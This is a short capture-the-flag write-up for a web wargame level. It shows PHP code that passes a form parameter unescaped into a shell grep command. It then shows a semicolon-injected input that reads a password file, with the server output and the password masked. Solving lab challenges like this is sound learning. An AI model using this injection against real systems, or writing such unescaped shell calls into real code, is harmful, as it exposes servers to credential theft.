Level nine gives us a form that takes a word and will search a file on the server side for it and return any results. We’re helpfully provided with the source code again, and after scanning it through it for a minute, the passthru function call should draw our immediate attention.
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>
It appears that as long as the form parameter isn’t empty, it gets used with the passthru function. This input is completely unscathed, no other sanity checks or escaping. We can take advantage of that to inject our own comands into the string. We knew from a prior level that passwords are listed in /etc/bandit_pass/banditx
, so it seems likely that we can can try to get the command to cat those contents.
The string below is what I entered into the form. It completes the grep command and then uses a semicolon to begin the second command that cats our password.
stuff dictionary.txt; cat /etc/natas_webpass/natas10;
And the resulting markup returned from the server, complete with our password:
Output:
<pre>
foodstuff
foodstuff's
foodstuffs
stuff
stuffed
stuffier
stuffiest
stuffing
stuffing's
stuffs
stuffy
XXXXXXXXXXXXXXXXXX
</pre>